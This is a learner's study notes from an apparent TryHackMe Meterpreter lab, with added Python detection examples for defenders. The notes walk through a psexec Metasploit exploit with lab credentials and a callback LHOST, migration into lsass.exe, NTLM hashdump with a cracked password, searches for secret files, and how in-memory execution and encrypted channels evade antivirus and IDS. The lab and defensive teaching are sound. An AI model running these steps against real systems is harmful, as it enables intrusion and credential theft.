Exploitation Basics

Meterpreter – My Study Notes


Task 1: Introduction to Meterpreter

When I studied this room, I understood that Meterpreter is an advanced payload inside the Metasploit Framework. It is mainly used during exploitation and post-exploitation.

Instead of just giving a simple shell, Meterpreter gives a powerful interactive environment that allows me to:

  • Interact with the target OS
  • Manage files
  • Execute commands
  • Dump hashes
  • Capture screenshots
  • Escalate privileges

Meterpreter runs on the target system as an agent and communicates back to my attacking machine through a command-and-control (C2) channel.


How Meterpreter Works (Important Concept)

One thing that stood out to me is that Meterpreter:

  • Does NOT install itself on the target.
  • Runs completely in memory (RAM).
  • Does not drop a file like meterpreter.exe on disk.

This is important because most antivirus software scans files written to disk. Since Meterpreter runs only in memory, it avoids simple file-based detection.

Also, communication between the victim machine and my attacking machine is usually encrypted (TLS).

If a company does not decrypt and inspect HTTPS traffic, IDS/IPS systems may not detect Meterpreter traffic.

However, I must remember:
Modern antivirus and EDR solutions can still detect Meterpreter.


Checking the Process (getpid and ps)

After exploitation, I can check which process Meterpreter is running inside:

meterpreter > getpid

This gives the PID (Process ID).

Then I can list all processes:

meterpreter > ps

I noticed that Meterpreter injects itself into legitimate processes (for example spoolsv.exe). So I will not see meterpreter.exe in the process list.

Even checking loaded DLLs does not clearly reveal Meterpreter.
This shows how stealthy it is.
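The notes above make the point that Meterpreter shows up neither as a file on disk nor as a process of its own, which is exactly why defenders hunt for it by behaviour rather than by name. The Python below is an added example of that idea, not code from the TryHackMe room or from Metasploit: it scans constructed Sysmon-style NetworkConnect (Event ID 3) records and flags a host process (here spoolsv.exe, the example process named in the notes) that opens an outbound connection to an address outside the internal ranges. The event layout, the addresses, and the EXTERNAL_OK baseline are all assumptions made for this example.

```python
# Added example, not part of the TryHackMe room or of Metasploit: hunting for
# an in-memory agent by behaviour. "ps" shows no meterpreter.exe because the
# agent lives inside a host process such as spoolsv.exe, so a defender looks
# instead at which processes open network connections. The records mimic
# Sysmon Event ID 3 (NetworkConnect) fields; every value is constructed.
from ipaddress import ip_address, ip_network

# Constructed sample events (assumption: simplified Sysmon-like dicts; a real
# pipeline would read the Sysmon event log or a SIEM export instead).
SAMPLE_EVENTS = [
    {"EventId": 3, "Image": r"C:\Windows\System32\spoolsv.exe", "ProcessId": 1304,
     "Initiated": True, "DestinationIp": "10.10.12.7", "DestinationPort": 9100},
    {"EventId": 3, "Image": r"C:\Windows\System32\spoolsv.exe", "ProcessId": 1304,
     "Initiated": True, "DestinationIp": "203.0.113.45", "DestinationPort": 443},
    {"EventId": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ProcessId": 5120, "Initiated": True, "DestinationIp": "198.51.100.9",
     "DestinationPort": 443},
    {"EventId": 3, "Image": r"C:\Windows\System32\svchost.exe", "ProcessId": 3088,
     "Initiated": True, "DestinationIp": "10.10.12.1", "DestinationPort": 53},
    {"EventId": 3, "Image": r"C:\Windows\System32\svchost.exe", "ProcessId": 3088,
     "Initiated": False, "DestinationIp": "10.10.12.50", "DestinationPort": 135},
]

# Address ranges treated as "inside the network" (RFC 1918, loopback, link-local).
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Programs expected to reach external addresses (assumption: a toy baseline;
# a real one is built from the organisation's own telemetry).
EXTERNAL_OK = {"firefox.exe", "chrome.exe", "msedge.exe", "outlook.exe", "svchost.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_external(ip: str) -> bool:
    """True when the address falls outside every internal range."""
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_suspicious_connections(events):
    """Outbound connections to external addresses from processes outside the
    baseline. Returns (image, pid, destination ip, destination port) tuples."""
    hits = []
    for ev in events:
        if ev.get("EventId") != 3 or not ev.get("Initiated"):
            continue                # only connections this host opened itself
        if not is_external(ev["DestinationIp"]):
            continue                # spoolsv.exe printing to a LAN printer is normal
        name = image_name(ev["Image"])
        if name in EXTERNAL_OK:
            continue
        hits.append((name, ev["ProcessId"], ev["DestinationIp"], ev["DestinationPort"]))
    return hits


if __name__ == "__main__":
    for image, pid, ip, port in find_suspicious_connections(SAMPLE_EVENTS):
        print(f"ALERT: {image} (pid {pid}) opened {ip}:{port} - unexpected external connection")
```

The print spooler talking to a printer on 10.10.12.7 passes, while the same process reaching 203.0.113.45:443 is flagged even though the port looks like ordinary HTTPS; encrypted C2 is invisible to content inspection, but the choice of process that opened the socket is not.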


Task 2: Meterpreter Flavors

Payloads in Metasploit are divided into:

  • Inline (Single)
  • Staged

Staged Payload

Delivered in two steps:

  1. A small stager is sent first.
  2. The stager connects back and downloads the rest of the payload (the stage).

Advantage → smaller initial payload.

Inline Payload

Delivered in one step (full payload at once).

Meterpreter supports both staged and stageless versions.


Listing Available Meterpreter Payloads

To see available versions:

msfvenom --list payloads | grep meterpreter

Meterpreter exists for many platforms:

  • Windows
  • Linux
  • Android
  • macOS
  • PHP
  • Python
  • Java
  • iOS

How I Choose the Correct Version

When selecting a Meterpreter payload, I consider:

  1. Target OS (Windows? Linux? etc.)
  2. Available components (Python installed? PHP server?)
  3. Network restrictions (Is reverse TCP allowed? Only HTTPS?)
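The staged/inline distinction and the platform choice both show up in the payload name that `msfvenom --list payloads` prints: Metasploit names a staged payload with a slash between stage and stager (windows/meterpreter/reverse_tcp) and a stageless one with an underscore (windows/meterpreter_reverse_tcp). The Python below is an added example, not code from the room or from Metasploit, that parses such names and filters them by the three criteria listed above (target OS, architecture and transport, staging); the SAMPLE_PAYLOADS list is a hand-picked subset constructed for the example.

```python
# Added example (not from the TryHackMe room or Metasploit itself): classify
# Meterpreter payload names the way "msfvenom --list payloads | grep meterpreter"
# prints them. Metasploit's naming convention: a staged payload separates the
# stage from the stager with "/" (windows/meterpreter/reverse_tcp); a stageless
# (inline) payload joins them with "_" (windows/meterpreter_reverse_tcp).
from dataclasses import dataclass

# Constructed sample (assumption: a short hand-picked subset, not the full
# list msfvenom would print).
SAMPLE_PAYLOADS = [
    "windows/meterpreter/reverse_tcp",
    "windows/x64/meterpreter/reverse_https",
    "windows/x64/meterpreter_reverse_https",
    "linux/x64/meterpreter/reverse_tcp",
    "linux/x86/meterpreter_reverse_tcp",
    "android/meterpreter/reverse_tcp",
    "python/meterpreter/reverse_tcp",
    "php/meterpreter_reverse_tcp",
    "java/meterpreter/bind_tcp",
]


@dataclass(frozen=True)
class PayloadInfo:
    name: str
    platform: str
    arch: str        # "x64", "x86", or "" when the name carries no architecture
    staged: bool
    transport: str   # e.g. "reverse_tcp", "reverse_https", "bind_tcp"


def parse_payload(name: str) -> PayloadInfo:
    """Split a Metasploit payload name into platform, arch, staging and transport."""
    parts = name.split("/")
    platform = parts[0]
    arch = parts[1] if len(parts) > 2 and parts[1] in ("x64", "x86") else ""
    rest = parts[2:] if arch else parts[1:]
    if len(rest) == 2 and rest[0] == "meterpreter":
        # "meterpreter/<transport>": stager first, stage downloaded afterwards
        return PayloadInfo(name, platform, arch, True, rest[1])
    if len(rest) == 1 and rest[0].startswith("meterpreter_"):
        # "meterpreter_<transport>": everything shipped in one piece
        return PayloadInfo(name, platform, arch, False, rest[0][len("meterpreter_"):])
    raise ValueError(f"not a Meterpreter payload name: {name}")


def select_payloads(names, platform, transports=None, arch=None, staged=None):
    """Filter payload names by the criteria from the notes: target OS, allowed
    transports (network restrictions), CPU architecture and staging."""
    chosen = []
    for name in names:
        info = parse_payload(name)
        if info.platform != platform:
            continue
        if transports is not None and info.transport not in transports:
            continue
        if arch is not None and info.arch != arch:
            continue
        if staged is not None and info.staged != staged:
            continue
        chosen.append(name)
    return chosen


if __name__ == "__main__":
    # A Windows target behind a proxy that only lets HTTPS out:
    for name in select_payloads(SAMPLE_PAYLOADS, "windows", transports={"reverse_https"}):
        info = parse_payload(name)
        print(f"{name}: {'staged' if info.staged else 'stageless'}, arch={info.arch or 'any'}")
```

Reading the name this way also explains the "smaller initial payload" trade-off: the staged entry for a platform is the one whose first connection only carries the stager, so the full agent still has to cross the network afterwards, which is one more thing for network monitoring to see.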

Sometimes exploits automatically choose a default payload, for example:

use exploit/windows/smb/ms17_010_eternalblue

I can list other compatible payloads with:

show payloads

Task 3: Meterpreter Commands

When I get a session, the first thing I should do is:

meterpreter > help

Each Meterpreter flavor exposes a different set of commands, so the help output is the reliable reference for the session I actually have.

Commands are grouped into categories:

  • Core
  • File System
  • Networking
  • System
  • Privilege Escalation
  • Password database
  • Webcam / Audio
  • Timestomp

Most Important Commands (That I Should Remember)

Core

  • background → Send session to background
  • exit → Close session
  • help → Show commands
  • migrate → Move to another process
  • load → Load extension

File System

  • cd
  • ls
  • pwd
  • cat
  • search
  • upload
  • download

System

  • getuid → See which user I am
  • getpid
  • ps
  • sysinfo
  • shell
  • hashdump
  • getsystem

Important: Not all commands will work in every environment.


Task 4: Post-Exploitation with Meterpreter

This phase is very important.

Main goals:

  • Gather more information
  • Find credentials
  • Escalate privileges
  • Move laterally

getuid

meterpreter > getuid

This tells me which user I am running as.
If I see NT AUTHORITY\SYSTEM, that means I have high privileges.


ps

meterpreter > ps

Lists processes and their PIDs.

Very useful before using migrate.


migrate

meterpreter > migrate <PID>

This moves my Meterpreter session into another process.

Reasons to migrate:

  • More stable session
  • Hide inside trusted process
  • Capture keystrokes

Important note:
If I migrate from a SYSTEM process into a lower-privileged process, I may lose those privileges.


hashdump

meterpreter > hashdump

This dumps NTLM hashes from the SAM database.

Hashes can be:

  • Cracked
  • Used in Pass-the-Hash attacks


search

meterpreter > search -f secrets.txt

Very useful for finding flags or sensitive files.
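The migrate and hashdump sections above describe the two actions a defender most wants to catch: a session moving into another process, and credential material being pulled out of lsass.exe. On a Windows host with Sysmon, a thread started in another process is logged as Event ID 8 (CreateRemoteThread) and a handle opened on a process as Event ID 10 (ProcessAccess) together with the granted access mask. The Python below is an added example, not code from the room or from Metasploit, that applies both rules to a constructed log; the pipe-delimited line layout, the sample lines and the BENIGN_SOURCES baseline are assumptions made for this example.

```python
# Added example, not part of the TryHackMe room or of Metasploit: detecting the
# two behaviours from the notes (migrate into lsass.exe, then hashdump) from
# host telemetry. Sysmon records a remote thread as Event ID 8 and a process
# handle as Event ID 10 with the access mask; the sample lines, the layout and
# the baseline are constructed for this example.
LSASS = "lsass.exe"
PROCESS_VM_READ = 0x0010      # access right needed to read another process's memory

# Constructed sample log: EventId|SourceImage|TargetImage|GrantedAccess (hex, Event 10 only)
SAMPLE_LOG = r"""
8|C:\Windows\System32\spoolsv.exe|C:\Windows\System32\lsass.exe|
10|C:\Windows\System32\spoolsv.exe|C:\Windows\System32\lsass.exe|0x1010
10|C:\Windows\System32\csrss.exe|C:\Windows\System32\lsass.exe|0x1FFFFF
10|C:\Windows\System32\spoolsv.exe|C:\Windows\System32\lsass.exe|0x1000
8|C:\Windows\System32\csrss.exe|C:\Windows\explorer.exe|
""".strip()

# Sources that legitimately create threads in, or read, other processes
# (assumption: toy baseline; tune against the environment's own telemetry).
BENIGN_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> dict:
    """Split one constructed log line into its four fields."""
    event_id, source, target, access = line.split("|")
    return {
        "event_id": int(event_id),
        "source": image_name(source),
        "target": image_name(target),
        "access": int(access, 16) if access else 0,
    }


def analyse(log_text: str):
    """Return (rule, source, target) for events that look like process
    migration or a read of lsass memory."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev["source"] in BENIGN_SOURCES:
            continue
        if ev["event_id"] == 8:
            # A thread started in another process is the mechanism behind "migrate".
            alerts.append((f"remote thread created in {ev['target']}",
                           ev["source"], ev["target"]))
        elif ev["event_id"] == 10 and ev["target"] == LSASS and ev["access"] & PROCESS_VM_READ:
            # A handle on lsass that includes VM_READ is the precondition for
            # pulling secrets out of its memory.
            alerts.append(("lsass.exe memory opened for reading",
                           ev["source"], ev["target"]))
    return alerts


if __name__ == "__main__":
    for rule, source, target in analyse(SAMPLE_LOG):
        print(f"ALERT: {rule}: {source} -> {target}")
```

The fourth sample line is deliberately benign: spoolsv.exe opening lsass.exe with 0x1000 (query-limited information only) carries no read right and is not flagged, while the 0x1010 handle on the second line is. Migrating the session and dumping hashes both leave exactly these traces, which is the practical side of the note above that modern EDR can still catch an in-memory agent.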


shell

meterpreter > shell

Opens a normal Windows command shell.

Press CTRL + Z to return to Meterpreter.


Task 5: Post-Exploitation Challenge Notes

Step 1 – Using psexec

use exploit/windows/smb/psexec

Then set:

set RHOSTS 10.10.190.19
set SMBUser ballen
set SMBPass Password1
set LHOST 10.10.186.144
set LPORT 4444
exploit

After exploitation, I get a Meterpreter session.


Finding Computer Name

meterpreter > sysinfo

Computer name: ACME-TEST

Domain: FLASH


Finding User-Created Share

Background session:

background

Then:

use post/windows/gather/enum_shares
set SESSION 1
run

User-created share: speedster


Dumping jchambers NTLM Hash

Steps:

  1. Return to session:
     sessions -i 1
  2. Check processes:
     ps
  3. Find the lsass.exe PID
  4. Migrate:
     migrate 780
  5. Dump hashes:
     hashdump

NTLM hash: 69596c7aa1e8daee17f8e78870e25a5c

Cracked password: Trustno1


Finding secrets.txt

search -f secrets.txt

Location: c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

View content:

cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"

Twitter password: KDSvbsw3849!


Finding realsecret.txt

search -f realsecret.txt

Location: c:\inetpub\wwwroot\realsecret.txt

View content:

cat "c:\inetpub\wwwroot\realsecret.txt"

Real secret: The Flash is the fastest man alive


My Final Understanding

Meterpreter is extremely powerful because:

  • It runs in memory
  • It uses encrypted communication
  • It provides built-in post-exploitation tools
  • It allows privilege escalation
  • It allows credential dumping
  • It supports extensions like kiwi

If I master Meterpreter, I can control almost every aspect of a compromised machine during a penetration test.